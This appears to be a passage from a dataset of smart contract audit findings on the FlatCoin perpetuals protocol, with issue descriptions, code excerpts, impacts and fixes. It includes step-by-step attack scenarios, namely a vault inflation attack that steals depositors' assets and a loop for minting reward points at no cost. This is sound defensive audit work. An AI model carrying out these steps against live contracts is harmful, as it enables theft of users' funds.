PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the 
`marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\nчUse the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\nчLoss of assets for the LP as mentioned in the above section.ч```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert 
FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n -Long trader's deposited margin can be wiped outчhighчLong Trader's deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 is $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. 
Thus, the condition at Line 232 will be evaluated as `false,` and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` result in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.чIf the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determine if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTota + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\nчLoss of assets for the long traders as mentioned above.ч```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? 
uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n -Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage AdjustчmediumчFees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen user withdrawal from the stable LP, vault total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen _withdrawFee is calculated and checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, vault collateral is settled again with withdrawFee, keeper receives keeperFee and `(amountOut - totalFee)` amount of collaterals are transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of keeper fee and withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means withdrawal fee is still in the vault, however this fee is ignored when checks skew max and protocol may revert on a safe withdrawal. 
Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt the moment, there is `100` collaterals in the Vault, skew is `0` and skew fraction is 100%;\\nAlice tries to withdraw `16.8` collaterals, withdrawFee is `0.168`, after withdrawal, it is expected that there is `83.368` stable collaterals in the Vault, so skewFraction should be `119.5%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when protocol checks skew max, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when protocol executes a leverage open and leverage adjust, in both executions, tradeFee is ignored when checks skew max.\\nPlease see the test codes:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out 
`vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\nчInclude withdrawal fee / trade fee when check skew max.чProtocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even if the execution is essentially safe.ч```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n -In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position dataчmediumч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is positive value, then `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is negative value, then `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 
90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh price=2000e18\\n```\\n\\nWe explain it in two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso checkSkewMax will be passed.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. 
\\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to open, as this will only make the system more skewed towards the long side.ч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\nчThe `stableCollateralTotal` used by `checkSkewMax` is the value of the total profit that has not yet been settled, which is old value. 
In this way, when the price of collateral rises, it will cause the system to be more skewed towards the long side.ч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n -Oracle will not failover as expected during liquidationчmediumчOracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. 
If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. 
When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? 
FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\nчConsider implementing a feature to allow the protocol team to disable the price deviation check so that the protocol team can disable it in the event that Pyth network is down for an extended period of time.чThe liquidation mechanism is the core component of the protocol and is important to the solvency of the protocol. If the liquidation cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.ч```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n -Large amounts of points can be minted virtually without any costчmediumчLarge amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. 
Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. 
Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an \"announce withdraw order\" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. 
The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\nчOne approach that could mitigate this risk is also to impose withdraw fee for the final/last withdrawal so that no one could abuse this exception to perform any attack that was once not profitable due to the need to pay withdraw fee.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can attempt to open and adjust/close a position repeatedly to obtain more points.чLarge amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. 
A malicious user could abuse this to obtain a large number of points, which could obtain excessive value from the protocol and create unfairness among other protocol users.ч```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n -Vault Inflation AttackчmediumчMalicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation Attack against the FlatCoin vault. 
The general process of this attack is well-known, and a detailed explanation of this attack can be found in many of the resources such as the following:\\nIn short, to kick-start the attack, the malicious user will often usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. Subsequently, it will cause a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to workaround/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mint 1 mint of share\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mint 1 mint of share\\nUsers could attempt to mint 1 wei of share. However, the validation check at Line 79 will revert as the share minted is less than `MIN_LIQUIDITY` = 10_000. 
However, this minimum liquidation requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei shares via `executeDeposit` function. Next, Bob withdraws 9999 wei shares via the `executeWithdraw`. In the end, Bob successfully owned only 1 wei share, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the number of collateral within the state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose any or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. 
The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions till the max skew of 120%. Thus, this will cause the funding rate to increase, and the long will have to pay the LPs, which will also increase the collateral per share.\\nTriggering rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. Following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their share from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.чA `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking if the `totalSupply() < MIN_LIQUIDITY` is not sufficient, and could be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against inflation attack is to mint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2).чMalicious users could steal the assets of the victim.ч```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = 
_getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n -Long traders unable to withdraw their assetsчmediumчWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(\"collateralNet\");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 ETH\\nCollateral 
